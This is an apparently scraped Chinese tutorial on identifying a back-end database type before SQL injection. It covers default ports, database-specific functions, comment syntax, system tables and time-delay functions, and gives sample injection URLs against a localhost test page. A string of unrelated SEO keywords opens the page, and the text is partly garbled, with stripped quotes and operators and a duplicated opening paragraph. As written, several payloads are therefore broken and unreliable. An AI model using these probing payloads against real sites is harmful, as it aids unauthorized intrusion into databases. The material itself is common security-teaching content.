浙江网站设计公司电话,云主机软件,外贸公司有哪些工作岗位,天津住房与城乡建设厅网站首页前言
在进行SQL注入之前#xff0c;首先应该判断数据库的类型#xff0c;不同的数据库在处理一些函数的时候会有一些微妙的差别#xff0c;只有判断出是哪种数据库类型#xff0c;这样才能根据数据库的类型选择合适的函数#xff0c;更容易实现SQL注入。
# 前端与数据库…前言
在进行SQL注入之前首先应该判断数据库的类型不同的数据库在处理一些函数的时候会有一些微妙的差别只有判断出是哪种数据库类型这样才能根据数据库的类型选择合适的函数更容易实现SQL注入。
# 前端与数据库类型
aspSQL ServerAccess.netSQL ServerphpMySQLPostgreSQLjavaOracleMySQL# 根据端口判断
Oracle默认端口 1521SQL Server默认端口 1433MySQL默认端口 3306# 根据数据库特有函数来判断
# len和length
len()SQL Server 、MySQL以及db2返回长度的函数。length()Oracle和INFORMIX返回长度的函数。# version和version
version()MySQL查询版本信息的函数versionMySQL和SQL Server查询版本信息的函数# substring和substr
MySQL两个函数都可以使用Oracle只可调用substrSQL Server只可调用substring# 根据特殊符号进行判断
/* 是MySQL数据库的注释符-- 是Oracle和SQL Server支持的注释符; 是子句查询标识符Oracle不支持多行查询若返回错误则说明可能是Oracle数据库# 是MySQL中的注释符返回错误则说明可能不是MySQL另外也支持-- 和/**/# 根据数据库对字符串的处理方式判断
# MySQL
http://127.0.0.1/test.php?id1 and abab http://127.0.0.1/test.php?id1 and CONCAT(a,b)ab# Oracle
http://127.0.0.1/test.php?id1 and a||babhttp://127.0.0.1/test.php?id1 and CONCAT(a,b)ab # SQL Server
http://127.0.0.1/test.php?id1 and abab # 根据数据库特有的数据表来判断
# MySQLversion5.0
http://127.0.0.1/test.php?id1 and (select count(*) from information_schema.TABLES)0 and 11# Oracle
http://127.0.0.1/test.php?id1 and (select count(*) from sys.user_tables)0 and 11# SQL Server
http://127.0.0.1/test.php?id1 and (select count(*) from sysobjects)0 and 11# 根据盲注特别函数判断
# MySQL
BENCHMARK(1000000,ENCODE(QWE,ASD))SLEEP(5)# PostgreSQL
PG_SLEEP(5)GENERATE_SERIES(1,1000000)# SQL Server
WAITFOR DELAY 0:0:5
